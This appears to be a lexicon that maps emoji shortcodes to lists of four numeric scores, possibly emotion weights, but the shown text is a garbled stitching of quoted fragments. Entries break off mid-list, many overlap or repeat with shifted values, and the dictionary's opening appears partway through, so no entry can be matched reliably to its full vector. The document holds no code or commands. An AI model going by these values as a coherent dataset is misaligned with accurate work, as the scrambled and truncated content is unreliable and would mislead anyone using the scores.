\":artist_palette:\":", "\":bell:\": [0.27, 0.21899999999999997, 0.242, 0.42700000000000005], \":seven_o’clock:\": [0.15, 0.35, 0.08900000000000001, 0.33], \":smiling_face_with_horns:\": [0.213, 0.055,", "0.121], \":tomato:\": [0.284, 0.22, 0.294, 0.23600000000000002], \":blue_book:\": [0.156, 0.191, 0.149, 0.193], \":headphone:\": [0.16699999999999998,", "0.46, 0.17300000000000001], \":chequered_flag:\": [0.221, 0.184, 0.125, 0.263], \":couple_with_heart:\": [0.165, 0.113, 0.409, 0.25], \":relieved_face:\":", "[0.244, 0.22, 0.11199999999999999, 0.27899999999999997], \":eggplant:\": [0.353, 0.23399999999999999, 0.17800000000000002, 0.165], \":shaved_ice:\": [0.213, 0.168, 0.152,", "[0.415, 0.309, 0.149, 0.322], \":ant:\": [0.26899999999999996, 0.308, 0.098, 0.11199999999999999], \":envelope_with_arrow:\": [0.251, 0.08800000000000001, 0.063,", "0.193], \":trident_emblem:\": [0.228, 0.14400000000000002, 0.21899999999999997, 0.257], \":five_o’clock:\": [0.126, 0.335, 0.21, 0.264], \":unamused_face:\": [0.418,", "\":tennis:\": [0.174, 0.198, 0.174, 0.327], \":sleeping_face:\": [0.266, 0.23399999999999999, 0.33, 0.255], \":red_paper_lantern:\": 
[0.111, 0.235,", "0.13699999999999998, 0.214], \":two-hump_camel:\": [0.151, 0.263, 0.131, 0.154], \":white_flower:\": [0.187, 0.141, 0.19, 0.14400000000000002], \":weary_cat_face:\":", "0.201, 0.305], \":magnifying_glass_tilted_right:\": [0.177, 0.253, 0.244, 0.12300000000000001], \":red_circle:\": [0.244, 0.22, 0.11199999999999999, 0.27899999999999997], \":eggplant:\":", "0.203], \":package:\": [0.126, 0.18600000000000003, 0.214, 0.14300000000000002], \":castle:\": [0.069, 0.20199999999999999, 0.132, 0.222], \":bookmark_tabs:\": [0.13699999999999998,", "\":Aquarius:\": [0.17800000000000002, 0.306, 0.23199999999999998, 0.228], \":ear:\": [0.299, 0.33, 0.316, 0.35700000000000004], \":dvd:\": [0.184, 0.14300000000000002,", "\":face_without_mouth:\": [0.34, 0.335, 0.15, 0.359], \":blue_heart:\": [0.14800000000000002, 0.064, 0.28600000000000003, 0.281], \":Japanese_symbol_for_beginner:\": [0.222, 0.121,", "[0.132, 0.10800000000000001, 0.34, 0.265], \":school:\": [0.15, 0.268, 0.29600000000000004, 0.162], \":newspaper:\": [0.222, 0.33799999999999997, 0.27,", "0.179, 0.245, 0.243], \":ice_cream:\": [0.228, 0.18899999999999997, 0.23199999999999998, 0.114], \":bento_box:\": [0.136, 0.16, 0.159, 0.212],", "[0.075, 0.24600000000000002, 0.196, 0.184], \":lipstick:\": [0.276, 0.168, 0.502, 0.141], \":smiling_face_with_halo:\": [0.10800000000000001, 0.092, 0.28,", "0.205, 0.36700000000000005], \":rainbow:\": [0.183, 0.207, 0.317, 0.261], \":microphone:\": [0.121, 0.081, 0.237, 0.29], \":musical_score:\":", "[0.107, 0.292, 0.4, 0.158], \":artist_palette:\": [0.136, 0.11800000000000001, 0.442, 0.057999999999999996], \":battery:\": [0.08199999999999999, 0.179, 0.196,", "0.081, 0.17600000000000002], \":love_hotel:\": [0.040999999999999995, 0.141, 0.22899999999999998, 0.155], \":alien_monster:\": [0.128, 0.228, 0.087, 0.19699999999999998], \":file_folder:\":", "\":grinning_face_with_sweat:\": [0.19, 0.307, 0.23199999999999998, 0.27699999999999997], \":loudly_crying_face:\": 
[0.24600000000000002, 0.276, 0.198, 0.272], \":hamburger:\": [0.177, 0.122,", "0.155, 0.138], \":bear_face:\": [0.205, 0.256, 0.129, 0.196], \":keycap_10:\": [0.217, 0.109, 0.086, 0.17300000000000001], \":kissing_face_with_closed_eyes:\":", "0.35, 0.08900000000000001, 0.33], \":smiling_face_with_horns:\": [0.213, 0.055, 0.081, 0.193], \":up-left_arrow:\": [0.193, 0.214, 0.18600000000000003, 0.124],", "[0.127, 0.26899999999999996, 0.172, 0.309], \":white_medium-small_square:\": [0.305, 0.22699999999999998, 0.126, 0.187], \":white_large_square:\": [0.348, 0.19399999999999998, 0.155,", "0.139], \":pager:\": [0.14400000000000002, 0.191, 0.22899999999999998, 0.259], \":anxious_face_with_sweat:\": [0.34299999999999997, 0.439, 0.134, 0.35200000000000004], \":tropical_drink:\": [0.14400000000000002,", "[0.198, 0.29600000000000004, 0.287, 0.19699999999999998], \":small_orange_diamond:\": [0.258, 0.162, 0.23399999999999999, 0.271], \":map_of_Japan:\": [0.122, 0.213, 0.24100000000000002,", "0.192, 0.28600000000000003, 0.175], \":musical_notes:\": [0.149, 0.131, 0.326, 0.31], \":open_file_folder:\": [0.213, 0.263, 0.171, 0.276],", "0.28, 0.392, 0.205], \":tangerine:\": [0.16899999999999998, 0.19899999999999998, 0.284, 0.237], \":beer_mug:\": [0.157, 0.12, 0.16699999999999998, 0.09699999999999999],", "\":skull:\": [0.36200000000000004, 0.267, 0.055999999999999994, 0.218], \":pill:\": [0.195, 0.253, 0.182, 0.203], \":package:\": [0.126, 0.18600000000000003,", "[0.195, 0.258, 0.182, 0.225], \":twelve_o’clock:\": [0.18600000000000003, 0.34700000000000003, 0.165, 0.349], \":kimono:\": [0.14400000000000002, 0.196, 0.23800000000000002,", "0.28800000000000003, 0.122], \":currency_exchange:\": [0.159, 0.20800000000000002, 0.127, 0.226], \":house_with_garden:\": [0.115, 0.24, 0.268, 0.153], \":spiral_shell:\":", "0.244, 0.196, 0.299], \":sunrise_over_mountains:\": [0.10300000000000001, 0.28, 0.392, 0.205], \":tangerine:\": [0.16899999999999998, 0.19899999999999998, 0.284, 0.237],", 
"0.14800000000000002, 0.075, 0.128], \":triangular_ruler:\": [0.198, 0.201, 0.284, 0.168], \":three_o’clock:\": [0.16699999999999998, 0.369, 0.209, 0.282],", "0.147, 0.145, 0.12300000000000001], \":tear-off_calendar:\": [0.139, 0.267, 0.095, 0.299], \":closed_mailbox_with_raised_flag:\": [0.191, 0.10800000000000001, 0.09699999999999999, 0.136],", "\":wavy_dash:\": [0.235, 0.287, 0.253, 0.268], \":bowling:\": [0.07400000000000001, 0.165, 0.073, 0.275], \":oncoming_fist:\": [0.23600000000000002, 0.253,", "[0.153, 0.21, 0.20600000000000002, 0.16], \":man_and_woman_holding_hands:\": [0.075, 0.096, 0.266, 0.131], \":part_alternation_mark:\": [0.203, 0.12300000000000001, 0.201,", "[0.156, 0.23800000000000002, 0.125, 0.057], \":snail:\": [0.162, 0.239, 0.19899999999999998, 0.17], \":cat_face:\": [0.147, 0.185, 0.19699999999999998,", "[0.261, 0.271, 0.33399999999999996, 0.152], \":full_moon:\": [0.17600000000000002, 0.284, 0.312, 0.20800000000000002], \":jack-o-lantern:\": [0.129, 0.327, 0.09,", "\":old_man:\": [0.27, 0.263, 0.276, 0.215], \":calendar:\": [0.174, 0.21, 0.131, 0.225], \":frowning_face_with_open_mouth:\": [0.37, 0.423,", "0.49200000000000005, 0.36], \":chart_increasing_with_yen:\": [0.175, 0.248, 0.305, 0.20800000000000002], \":satellite_antenna:\": [0.204, 0.259, 0.303, 0.27], \":mobile_phone:\":", "0.262], \":Gemini:\": [0.228, 0.132, 0.262, 0.177], \":hibiscus:\": [0.085, 0.218, 0.316, 0.151], \":notebook_with_decorative_cover:\": [0.139,", "0.17300000000000001, 0.14300000000000002, 0.177], \":ledger:\": [0.115, 0.17, 0.256, 0.182], \":shooting_star:\": [0.17600000000000002, 0.16, 0.377, 0.2],", "[0.19399999999999998, 0.327, 0.079, 0.061], \":bookmark:\": [0.257, 0.174, 0.182, 0.289], \":cat_face_with_wry_smile:\": [0.25, 0.083, 0.078,", "[0.10300000000000001, 0.077, 0.051, 0.192], \":clapping_hands:\": [0.21899999999999997, 0.256, 0.18899999999999997, 0.214], \":kiss_mark:\": [0.272, 0.10800000000000001, 0.273,", "[0.33299999999999996, 
0.11800000000000001, 0.268, 0.127], \":dizzy:\": [0.233, 0.147, 0.359, 0.134], \":six_o’clock:\": [0.14300000000000002, 0.39299999999999996, 0.16899999999999998,", "0.141], \":scroll:\": [0.254, 0.267, 0.276, 0.235], \":TOP_arrow:\": [0.162, 0.185, 0.205, 0.191], \":fearful_face:\": [0.344,", "\":pool_8_ball:\": [0.257, 0.09, 0.059000000000000004, 0.204], \":no_entry:\": [0.312, 0.445, 0.136, 0.344], \":water_wave:\": [0.106, 0.29,", "0.102], \":person_wearing_turban:\": [0.212, 0.293, 0.302, 0.239], \":crystal_ball:\": [0.16899999999999998, 0.22, 0.354, 0.196], \":moon_viewing_ceremony:\": [0.149,", "[0.175, 0.248, 0.305, 0.20800000000000002], \":satellite_antenna:\": [0.204, 0.259, 0.303, 0.27], \":mobile_phone:\": [0.127, 0.26899999999999996, 0.172,", "[0.177, 0.218, 0.213, 0.106], \":round_pushpin:\": [0.16399999999999998, 0.26899999999999996, 0.14800000000000002, 0.29], \":television:\": [0.322, 0.247, 0.22699999999999998,", "0.07400000000000001, 0.373, 0.10099999999999999], \":dizzy_face:\": [0.34700000000000003, 0.45799999999999996, 0.12300000000000001, 0.361], \":footprints:\": [0.21, 0.21, 0.163, 0.179],", "[0.319, 0.249, 0.141, 0.22699999999999998], \":spade_suit:\": [0.24600000000000002, 0.213, 0.187, 0.27899999999999997], \":performing_arts:\": [0.159, 0.10800000000000001, 0.204,", "\":magnifying_glass_tilted_right:\": [0.177, 0.253, 0.244, 0.12300000000000001], \":red_circle:\": [0.244, 0.22, 0.11199999999999999, 0.27899999999999997], \":eggplant:\": [0.353, 0.23399999999999999,", "\":grinning_face:\": [0.163, 0.17300000000000001, 0.171, 0.18600000000000003], \":girl:\": [0.22699999999999998, 0.16, 0.214, 0.146], \":pushpin:\": [0.299, 0.263,", "\":kissing_cat_face:\": [0.18899999999999997, 0.11900000000000001, 0.215, 0.21], \":backhand_index_pointing_down:\": [0.39299999999999996, 0.196, 0.317, 0.28600000000000003], \":sailboat:\": [0.10400000000000001, 0.225,", "0.23800000000000002], \":honeybee:\": [0.381, 0.285, 0.128, 0.111], \":rabbit_face:\": 
[0.165, 0.222, 0.217, 0.037000000000000005], \":pensive_face:\": [0.261,", "0.163, 0.158, 0.055], \":fork_and_knife:\": [0.053, 0.078, 0.126, 0.285], \":pile_of_poo:\": [0.35, 0.342, 0.151, 0.446],", "0.201, 0.457, 0.156], \":wheelchair_symbol:\": [0.18, 0.179, 0.09300000000000001, 0.264], \":Ophiuchus:\": [0.213, 0.17, 0.233, 0.228],", "\":bookmark_tabs:\": [0.13699999999999998, 0.228, 0.301, 0.23], \":face_savoring_food:\": [0.128, 0.107, 0.16899999999999998, 0.091], \":woman’s_sandal:\": [0.24600000000000002, 0.23600000000000002,", "0.207, 0.259, 0.243], \":clockwise_vertical_arrows:\": [0.22899999999999998, 0.23399999999999999, 0.23, 0.262], \":green_book:\": [0.154, 0.24, 0.391, 0.107],", "[0.179, 0.16699999999999998, 0.10099999999999999, 0.311], \":club_suit:\": [0.188, 0.228, 0.128, 0.248], \":wavy_dash:\": [0.235, 0.287, 0.253,", "0.132, 0.028999999999999998, 0.20600000000000002], \":collision:\": [0.16899999999999998, 0.16399999999999998, 0.048, 0.2], \":locked_with_pen:\": [0.168, 0.138, 0.19899999999999998, 0.12300000000000001],", "0.129, 0.155], \":running_shoe:\": [0.23199999999999998, 0.094, 0.08900000000000001, 0.185], \":sad_but_relieved_face:\": [0.3, 0.474, 0.145, 0.391], \":Christmas_tree:\":", "\":game_die:\": [0.126, 0.162, 0.09, 0.179], \":person_pouting:\": [0.293, 0.244, 0.196, 0.299], \":sunrise_over_mountains:\": [0.10300000000000001, 0.28,", "0.09300000000000001], \":white_small_square:\": [0.276, 0.22699999999999998, 0.125, 0.161], \":heavy_large_circle:\": [0.154, 0.17800000000000002, 0.122, 0.315], \":cityscape_at_dusk:\": [0.053,", "0.502, 0.141], \":smiling_face_with_halo:\": [0.10800000000000001, 0.092, 0.28, 0.12300000000000001], \":smirking_face:\": [0.258, 0.040999999999999995, 0.096, 0.146], \":face_screaming_in_fear:\":", "\":woman:\": [0.24100000000000002, 0.215, 0.29, 0.142], \":two_hearts:\": [0.172, 0.08800000000000001, 0.38299999999999995, 0.142], \":dollar_banknote:\": [0.21, 0.19,", "0.23199999999999998, 0.091, 0.153], 
\":four_o’clock:\": [0.165, 0.361, 0.171, 0.282], \":jeans:\": [0.2, 0.109, 0.134, 0.209],", "\":ghost:\": [0.147, 0.201, 0.017, 0.10800000000000001], \":telephone_receiver:\": [0.179, 0.16699999999999998, 0.10099999999999999, 0.311], \":club_suit:\": [0.188, 0.228,", "= { \":person_surfing:\": [0.12, 0.195, 0.08800000000000001, 0.222], \":locked:\": [0.146, 0.141, 0.196, 0.212], \":hammer:\":", "0.213], \":video_camera:\": [0.301, 0.29, 0.235, 0.20199999999999999], \":green_apple:\": [0.16, 0.188, 0.405, 0.102], \":bust_in_silhouette:\": [0.294,", "[0.158, 0.177, 0.27, 0.262], \":Gemini:\": [0.228, 0.132, 0.262, 0.177], \":hibiscus:\": [0.085, 0.218, 0.316,", "[0.157, 0.12, 0.16699999999999998, 0.09699999999999999], \":spouting_whale:\": [0.16, 0.184, 0.09, 0.159], \":crying_face:\": [0.284, 0.385, 0.21,", "[0.065, 0.133, 0.111, 0.18899999999999997], \":trumpet:\": [0.128, 0.17800000000000002, 0.20600000000000002, 0.221], \":mouth:\": [0.245, 0.136, 0.321,", "0.262], \":grinning_face_with_smiling_eyes:\": [0.184, 0.19699999999999998, 0.188, 0.149], \":folded_hands:\": [0.187, 0.17800000000000002, 0.485, 0.35100000000000003], \":musical_note:\": [0.26,", "0.083, 0.172], \":laptop_computer:\": [0.127, 0.23399999999999999, 0.35, 0.255], \":mushroom:\": [0.188, 0.239, 0.21, 0.084], \":grinning_face_with_big_eyes:\":", "[0.147, 0.235, 0.26899999999999996, 0.203], \":face_with_open_mouth:\": [0.271, 0.29, 0.16, 0.295], \":double_exclamation_mark:\": [0.157, 0.125, 0.063,", "[0.20800000000000002, 0.276, 0.773, 0.366], \":cyclone:\": [0.16899999999999998, 0.28800000000000003, 0.177, 0.214], \":black_large_square:\": [0.396, 0.159, 0.222,", "0.23600000000000002], \":blue_book:\": [0.156, 0.191, 0.149, 0.193], \":headphone:\": [0.16699999999999998, 0.14800000000000002, 0.266, 0.316], \":crown:\": [0.33299999999999996,", "0.209, 0.198], \":kissing_cat_face:\": [0.18899999999999997, 0.11900000000000001, 0.215, 0.21], \":backhand_index_pointing_down:\": [0.39299999999999996, 
0.196, 0.317, 0.28600000000000003], \":sailboat:\":", "\":snail:\": [0.162, 0.239, 0.19899999999999998, 0.17], \":cat_face:\": [0.147, 0.185, 0.19699999999999998, 0.16699999999999998], \":panda_face:\": [0.069, 0.23199999999999998,", "[0.43799999999999994, 0.17800000000000002, 0.11599999999999999, 0.282], \":crescent_moon:\": [0.098, 0.13699999999999998, 0.287, 0.218], \":ferris_wheel:\": [0.092, 0.168, 0.141,", "0.07400000000000001, 0.259], \":sunrise:\": [0.107, 0.292, 0.4, 0.158], \":artist_palette:\": [0.136, 0.11800000000000001, 0.442, 0.057999999999999996], \":battery:\":", "0.032], \":mouse_face:\": [0.18899999999999997, 0.20800000000000002, 0.136, 0.094], \":person_getting_massage:\": [0.264, 0.23199999999999998, 0.258, 0.282], \":ballot_box_with_check:\": [0.305,", "[0.11900000000000001, 0.128, 0.125, 0.17300000000000001], \":cinema:\": [0.273, 0.207, 0.20600000000000002, 0.218], \":people_with_bunny_ears:\": [0.24100000000000002, 0.11, 0.052000000000000005,", "0.34299999999999997, 0.129, 0.23800000000000002], \":honeybee:\": [0.381, 0.285, 0.128, 0.111], \":rabbit_face:\": [0.165, 0.222, 0.217, 0.037000000000000005],", "0.35, 0.191, 0.298], \":Pisces:\": [0.16899999999999998, 0.17600000000000002, 0.233, 0.239], \":soccer_ball:\": [0.147, 0.332, 0.115, 0.41100000000000003],", "[0.361, 0.212, 0.235, 0.228], \":winking_face:\": [0.098, 0.053, 0.129, 0.171], \":light_bulb:\": [0.237, 0.19899999999999998, 0.306,", "[0.16399999999999998, 0.239, 0.28800000000000003, 0.122], \":currency_exchange:\": [0.159, 0.20800000000000002, 0.127, 0.226], \":house_with_garden:\": [0.115, 0.24, 0.268,", "0.055], \":fork_and_knife:\": [0.053, 0.078, 0.126, 0.285], \":pile_of_poo:\": [0.35, 0.342, 0.151, 0.446], \":large_blue_diamond:\": [0.249,", "[0.305, 0.17800000000000002, 0.226, 0.213], \":high-heeled_shoe:\": [0.278, 0.11900000000000001, 0.23199999999999998, 0.195], \":input_symbols:\": [0.10800000000000001, 0.195, 0.138,", "0.439, 0.134, 0.35200000000000004], 
\":tropical_drink:\": [0.14400000000000002, 0.17800000000000002, 0.159, 0.11900000000000001], \":baby:\": [0.266, 0.201, 0.457, 0.156],", "0.14300000000000002, 0.43700000000000006, 0.231], \":tropical_fish:\": [0.063, 0.271, 0.14, 0.122], \":paw_prints:\": [0.266, 0.249, 0.129, 0.155],", "\":winking_face:\": [0.098, 0.053, 0.129, 0.171], \":light_bulb:\": [0.237, 0.19899999999999998, 0.306, 0.225], \":computer_disk:\": [0.19399999999999998, 0.187,", "\":crown:\": [0.33299999999999996, 0.11800000000000001, 0.268, 0.127], \":dizzy:\": [0.233, 0.147, 0.359, 0.134], \":six_o’clock:\": [0.14300000000000002, 0.39299999999999996,", "\":page_with_curl:\": [0.201, 0.294, 0.282, 0.27], \":BACK_arrow:\": [0.075, 0.166, 0.062, 0.20199999999999999], \":winking_face_with_tongue:\": [0.126, 0.059000000000000004,", "[0.16699999999999998, 0.157, 0.35100000000000003, 0.141], \":milky_way:\": [0.16699999999999998, 0.201, 0.43700000000000006, 0.22], \":ticket:\": [0.10800000000000001, 0.08199999999999999, 0.10099999999999999,", "0.35200000000000004], \":tropical_drink:\": [0.14400000000000002, 0.17800000000000002, 0.159, 0.11900000000000001], \":baby:\": [0.266, 0.201, 0.457, 0.156], \":wheelchair_symbol:\": [0.18,", "0.155, 0.22899999999999998], \":sparkler:\": [0.10300000000000001, 0.209, 0.221, 0.20600000000000002], \":fish:\": [0.131, 0.16699999999999998, 0.147, 0.102], \":person_wearing_turban:\":", "0.303], \":red_apple:\": [0.251, 0.182, 0.195, 0.121], \":pistol:\": [0.259, 0.38799999999999996, 0.081, 0.128], \":Japanese_secret_button:\": [0.19699999999999998,", "0.20199999999999999], \":green_apple:\": [0.16, 0.188, 0.405, 0.102], \":bust_in_silhouette:\": [0.294, 0.34700000000000003, 0.18600000000000003, 0.27899999999999997], \":woman_dancing:\": [0.11199999999999999,", "0.179, 0.32, 0.249], \":antenna_bars:\": [0.16399999999999998, 0.122, 0.151, 0.132], \":pouting_cat_face:\": [0.45399999999999996, 0.268, 0.11900000000000001, 0.295],", "[0.205, 0.256, 0.129, 0.196], 
\":keycap_10:\": [0.217, 0.109, 0.086, 0.17300000000000001], \":kissing_face_with_closed_eyes:\": [0.179, 0.08, 0.217,", "\":dashing_away:\": [0.363, 0.18, 0.102, 0.16399999999999998], \":Virgo:\": [0.17, 0.109, 0.264, 0.195], \":fallen_leaf:\": [0.133, 0.16699999999999998,", "0.262, 0.226, 0.251], \":input_numbers:\": [0.174, 0.18600000000000003, 0.21899999999999997, 0.139], \":worried_face:\": [0.349, 0.397, 0.09699999999999999, 0.348],", "0.11800000000000001], \":slot_machine:\": [0.085, 0.16899999999999998, 0.067, 0.23], \":unlocked:\": [0.207, 0.20600000000000002, 0.17, 0.109], \":leaf_fluttering_in_wind:\": [0.231,", "0.308, 0.11, 0.319], \":person_raising_hand:\": [0.068, 0.084, 0.08, 0.156], \":sweat_droplets:\": [0.26, 0.11900000000000001, 0.081, 0.16899999999999998],", "\":person_tipping_hand:\": [0.361, 0.099, 0.19699999999999998, 0.11199999999999999], \":down-right_arrow:\": [0.23, 0.242, 0.10300000000000001, 0.175], \":wedding:\": [0.092, 0.139,", "0.17, 0.285, 0.081], \":chicken:\": [0.16899999999999998, 0.192, 0.218, 0.127], \":sparkling_heart:\": [0.217, 0.068, 0.42200000000000004, 0.163],", "\":oncoming_fist:\": [0.23600000000000002, 0.253, 0.13, 0.273], \":nail_polish:\": [0.418, 0.121, 0.314, 0.099], \":nine_o’clock:\": [0.15, 0.36700000000000005,", "[0.231, 0.19399999999999998, 0.382, 0.139], \":closed_mailbox_with_lowered_flag:\": [0.184, 0.19, 0.109, 0.18100000000000002], \":sleepy_face:\": [0.267, 0.375, 0.205,", "\":magnifying_glass_tilted_left:\": [0.222, 0.276, 0.203, 0.131], \":Sagittarius:\": [0.17, 0.217, 0.21, 0.22], \":fuel_pump:\": [0.375, 0.161,", "\":ogre:\": [0.37, 0.419, 0.109, 0.257], \":chart_increasing:\": [0.22399999999999998, 0.259, 0.42700000000000005, 0.215], \":pouting_face:\": [0.46799999999999997, 0.36200000000000004,", "0.21100000000000002, 0.067, 0.134], \":growing_heart:\": [0.151, 0.067, 0.348, 0.13], \":smiling_face_with_heart-eyes:\": [0.307, 0.18, 0.308, 0.13699999999999998],", "0.168, 0.1], \":running_shirt:\": 
[0.138, 0.081, 0.20199999999999999, 0.203], \":heart_decoration:\": [0.13699999999999998, 0.046, 0.315, 0.141], \":scroll:\":", "0.213, 0.142], \":clutch_bag:\": [0.12300000000000001, 0.17, 0.253, 0.31], \":hundred_points:\": [0.254, 0.147, 0.145, 0.12300000000000001], \":tear-off_calendar:\":", "0.203, 0.345, 0.193], \":link:\": [0.258, 0.217, 0.179, 0.262], \":grinning_face_with_smiling_eyes:\": [0.184, 0.19699999999999998, 0.188, 0.149],", "0.278], \":OK_hand:\": [0.153, 0.21, 0.20600000000000002, 0.16], \":man_and_woman_holding_hands:\": [0.075, 0.096, 0.266, 0.131], \":part_alternation_mark:\": [0.203,", "0.21600000000000003, 0.11900000000000001, 0.188], \":white_circle:\": [0.22, 0.16399999999999998, 0.121, 0.217], \":old_woman:\": [0.235, 0.299, 0.326, 0.27899999999999997],", "0.392, 0.205], \":tangerine:\": [0.16899999999999998, 0.19899999999999998, 0.284, 0.237], \":beer_mug:\": [0.157, 0.12, 0.16699999999999998, 0.09699999999999999], \":spouting_whale:\":", "[0.24100000000000002, 0.11, 0.052000000000000005, 0.18], \":revolving_hearts:\": [0.2, 0.09699999999999999, 0.42700000000000005, 0.142], \":spaghetti:\": [0.055999999999999994, 0.149, 0.149,", "\":hatching_chick:\": [0.099, 0.171, 0.16, 0.125], \":heavy_dollar_sign:\": [0.203, 0.149, 0.113, 0.228], \":Taurus:\": [0.22, 0.2,", "0.21], \":disappointed_face:\": [0.318, 0.467, 0.131, 0.39399999999999996], \":fireworks:\": [0.051, 0.165, 0.191, 0.165], \":tongue:\": [0.316,", "0.132], \":pouting_cat_face:\": [0.45399999999999996, 0.268, 0.11900000000000001, 0.295], \":index_pointing_up:\": [0.254, 0.233, 0.49200000000000005, 0.36], \":chart_increasing_with_yen:\": [0.175,", "\":page_facing_up:\": [0.196, 0.31, 0.3, 0.29], \":notebook:\": [0.128, 0.14400000000000002, 0.281, 0.174], \":black_square_button:\": [0.361, 0.212,", "0.154, 0.22699999999999998], \":wine_glass:\": [0.046, 0.124, 0.218, 0.059000000000000004], \":octopus:\": [0.098, 0.23399999999999999, 0.19899999999999998, 0.086], \":ring:\":", 
"\":heavy_large_circle:\": [0.154, 0.17800000000000002, 0.122, 0.315], \":cityscape_at_dusk:\": [0.053, 0.24, 0.259, 0.23399999999999999], \":steaming_bowl:\": [0.183, 0.129,", "\":purse:\": [0.105, 0.196, 0.302, 0.20199999999999999], \":old_man:\": [0.27, 0.263, 0.276, 0.215], \":calendar:\": [0.174, 0.21,", "0.24, 0.259, 0.23399999999999999], \":steaming_bowl:\": [0.183, 0.129, 0.16699999999999998, 0.226], \":factory:\": [0.205, 0.306, 0.24600000000000002, 0.21],", "0.369, 0.209, 0.282], \":sunflower:\": [0.203, 0.243, 0.354, 0.212], \":lady_beetle:\": [0.228, 0.22, 0.20800000000000002, 0.153],", "[0.121, 0.081, 0.237, 0.29], \":musical_score:\": [0.149, 0.09, 0.371, 0.315], \":white_square_button:\": [0.35100000000000003, 0.226, 0.225,", "[0.153, 0.198, 0.19699999999999998, 0.10400000000000001], \":droplet:\": [0.19899999999999998, 0.223, 0.203, 0.248], \":cat_face_with_tears_of_joy:\": [0.43799999999999994, 0.17800000000000002, 0.11599999999999999,", "[0.18600000000000003, 0.34700000000000003, 0.165, 0.349], \":kimono:\": [0.14400000000000002, 0.196, 0.23800000000000002, 0.222], \":broken_heart:\": [0.244, 0.34, 0.19899999999999998,", "0.084], \":no_one_under_eighteen:\": [0.109, 0.136, 0.051, 0.179], \":left-right_arrow:\": [0.32899999999999996, 0.37200000000000005, 0.214, 0.335], \":smiling_cat_face_with_heart-eyes:\": [0.304,", "0.41100000000000003, 0.289], \":wrench:\": [0.25, 0.313, 0.337, 0.13699999999999998], \":hear-no-evil_monkey:\": [0.303, 0.27699999999999997, 0.094, 0.28300000000000003], \":circus_tent:\":", "\":white_medium-small_square:\": [0.305, 0.22699999999999998, 0.126, 0.187], \":white_large_square:\": [0.348, 0.19399999999999998, 0.155, 0.22899999999999998], \":sparkler:\": [0.10300000000000001, 0.209,", "0.165, 0.191, 0.165], \":tongue:\": [0.316, 0.062, 0.136, 0.133], \":videocassette:\": [0.213, 0.25, 0.312, 0.20800000000000002],", "[0.133, 0.16699999999999998, 0.28600000000000003, 0.168], \":top_hat:\": [0.172, 0.214, 
0.11199999999999999, 0.207], \":thumbs_up:\": [0.20199999999999999, 0.265, 0.264,", "0.16899999999999998, 0.067, 0.23], \":unlocked:\": [0.207, 0.20600000000000002, 0.17, 0.109], \":leaf_fluttering_in_wind:\": [0.231, 0.19399999999999998, 0.382, 0.139],", "0.217, 0.11599999999999999, 0.109], \":paperclip:\": [0.289, 0.21899999999999997, 0.19399999999999998, 0.231], \":outbox_tray:\": [0.204, 0.22899999999999998, 0.19699999999999998, 0.19399999999999998],", "0.184, 0.11699999999999999, 0.204], \":t-shirt:\": [0.21899999999999997, 0.078, 0.11599999999999999, 0.226], \":purse:\": [0.105, 0.196, 0.302, 0.20199999999999999],", "[0.138, 0.15, 0.191, 0.165], \":bell:\": [0.27, 0.21899999999999997, 0.242, 0.42700000000000005], \":seven_o’clock:\": [0.15, 0.35, 0.08900000000000001,", "0.193, 0.18600000000000003, 0.217], \":Japanese_castle:\": [0.092, 0.23199999999999998, 0.16399999999999998, 0.149], \":chestnut:\": [0.212, 0.16699999999999998, 0.16899999999999998, 0.078],", "0.299], \":downwards_button:\": [0.195, 0.258, 0.182, 0.225], \":twelve_o’clock:\": [0.18600000000000003, 0.34700000000000003, 0.165, 0.349], \":kimono:\": [0.14400000000000002,", "0.21899999999999997, 0.257], \":five_o’clock:\": [0.126, 0.335, 0.21, 0.264], \":unamused_face:\": [0.418, 0.297, 0.11900000000000001, 0.33299999999999996], \":bouquet:\":", "0.10099999999999999, 0.254, 0.23600000000000002], \":up_arrow:\": [0.382, 0.293, 0.21899999999999997, 0.284], \":teacup_without_handle:\": [0.156, 0.237, 0.429, 0.07],", "[0.18899999999999997, 0.11900000000000001, 0.215, 0.21], \":backhand_index_pointing_down:\": [0.39299999999999996, 0.196, 0.317, 0.28600000000000003], \":sailboat:\": [0.10400000000000001, 0.225, 0.142,", "0.196, 0.317, 0.28600000000000003], \":sailboat:\": [0.10400000000000001, 0.225, 0.142, 0.205], \":horse_face:\": [0.254, 0.16399999999999998, 0.078, 0.159],", "0.348, 0.13], \":smiling_face_with_heart-eyes:\": [0.307, 0.18, 0.308, 0.13699999999999998], \":kissing_face:\": [0.215, 
0.171, 0.159, 0.272], \":glowing_star:\":", "0.136, 0.177], \":anguished_face:\": [0.309, 0.485, 0.14, 0.369], \":flushed_face:\": [0.281, 0.263, 0.102, 0.231], \":person_frowning:\":", "0.15, 0.191, 0.165], \":bell:\": [0.27, 0.21899999999999997, 0.242, 0.42700000000000005], \":seven_o’clock:\": [0.15, 0.35, 0.08900000000000001, 0.33],", "0.215], \":pouting_face:\": [0.46799999999999997, 0.36200000000000004, 0.07400000000000001, 0.401], \":fish_cake_with_swirl:\": [0.10800000000000001, 0.21600000000000003, 0.355, 0.149], \":cookie:\": [0.11699999999999999,", "0.18100000000000002], \":page_facing_up:\": [0.196, 0.31, 0.3, 0.29], \":notebook:\": [0.128, 0.14400000000000002, 0.281, 0.174], \":black_square_button:\": [0.361,", "0.124], \":joker:\": [0.233, 0.28600000000000003, 0.051, 0.177], \":dolphin:\": [0.107, 0.184, 0.11699999999999999, 0.204], \":t-shirt:\": [0.21899999999999997,", "0.307], \":up-right_arrow:\": [0.19899999999999998, 0.22399999999999998, 0.159, 0.243], \":right_arrow_curving_up:\": [0.262, 0.255, 0.222, 0.22899999999999998], \":pizza:\": [0.142,", "0.171, 0.151, 0.12], \":dango:\": [0.27899999999999997, 0.193, 0.139, 0.054000000000000006], \":doughnut:\": [0.152, 0.259, 0.136, 0.15],", "0.18100000000000002, 0.141, 0.09], \":Japanese_post_office:\": [0.19, 0.309, 0.226, 0.249], \":nose:\": [0.38299999999999995, 0.272, 0.18600000000000003, 0.52],", "0.23399999999999999, 0.35, 0.255], \":mushroom:\": [0.188, 0.239, 0.21, 0.084], \":grinning_face_with_big_eyes:\": [0.19399999999999998, 0.177, 0.21600000000000003, 0.17],", "[0.10300000000000001, 0.254, 0.092, 0.262], \":memo:\": [0.147, 0.235, 0.26899999999999996, 0.203], \":face_with_open_mouth:\": [0.271, 0.29, 0.16,", "0.17], \":grinning_cat_face:\": [0.149, 0.192, 0.145, 0.25], \":hourglass_not_done:\": [0.19699999999999998, 0.31, 0.266, 0.25], \":sun_behind_cloud:\": [0.11199999999999999,", "0.14300000000000002, 0.146, 0.046], 